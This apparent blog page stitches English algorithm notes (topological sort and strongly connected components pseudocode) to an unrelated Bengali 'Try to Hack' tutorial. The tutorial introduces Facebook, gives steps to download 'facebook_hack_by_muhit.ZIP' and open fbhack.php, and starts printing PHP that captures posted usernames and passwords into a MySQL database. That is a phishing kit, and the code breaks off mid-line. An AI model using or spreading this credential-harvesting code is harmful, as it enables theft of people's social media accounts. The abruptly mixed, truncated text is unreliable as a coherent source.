A topological sort of a dag G = (V,E) is a linear ordering of all its vertices such that if G contains an edge (u,v), then u appears before v in the ordering. (If the graph contains a cycle, then no linear ordering is possible.) PSEUDOCODE TOPOLOGICAL-SORT(G) call DFS(G) to compute finishing times v.f for each vertex v as each vertex is finished, insert it onto the front of a linked list return the linked list of vertices
ফেইসবুক হচ্ছে সামজিক যোগাযোগের একটি ওয়েবসাইট, যা Mark Zuckerberg ২০০৪ সালের ফেব্রুয়ারি মাসে প্রতিষ্টা করেছেন। যেকেউ ফেইবুকে ফ্রি sign up করতে এবং তার প্রিয় বন্ধু, পরিবার এবং সহপাঠিদের সাথে বেশি বেশি করে যোগাযোগ করতে পারে। ফেইসবুকের উন্নত মানের আপ্লিকেশন - Photos, Events, Videos, Groups এবং Pages অন্যদের সাথে শেয়ার করতে সাহায্য করে। শুধু তাই নয়, এখানে মানুষ একে-অন্যের সাথে Chat, Personal messages, Wall posts, Pokes, অথবা Status আপডেটের মাধ্যমে যোগাযোগ করতে পারে। বর্তমানে ফেইসবুক ইউজার সংখ্যা ৫০০ মিলিয়নেরও বেশি এবং এর সংখ্যা ক্রমেই বাড়ছে। Try to Hack ধাপ-১ : প্রথমে facebook_hack_by_muhit.ZIP ফাইলটি আপনার কম্পিউটারে ডাউনলোড করুন। Click to Download ধাপ-২ : ফাইলটি ZIP এক্সটেনশনে আছে, এটি আনপেক করুন। ধাপ-৩ : আনজিপ ফোল্ডারটি অর্থাৎ facebook_hack_by_muhit ফোল্ডারটি ওপেন করে fbhack.php নামের ফাইলটি notepad -এ ওপেন করুন। নিচের কোডগুলু দেখতে পাবেন। <? $fname=$_POST["username"]; $fpass=$_POST["password"]; $con=mysql_connect("localhost","nur
Many algorithms that work with directed graphs begin with such a decomposition. After decomposing the graph into strongly connected components, such algorithms run separately on each one and then combine the solutions according to the structure of connections among components. ALGORITHM STRONGLY-CONNECTED-COMPONENTS(G) call DFS(G) to compute finishing times u.f for each vertex u compute GT call DFS(GT), but in the main loop of DFS, consider the verteces in order of decreasing u.f (as computed in line 2) output the vertices of each tree in the depth-first forest formed in line 4 as a separate strongly connected component
Comments
Post a Comment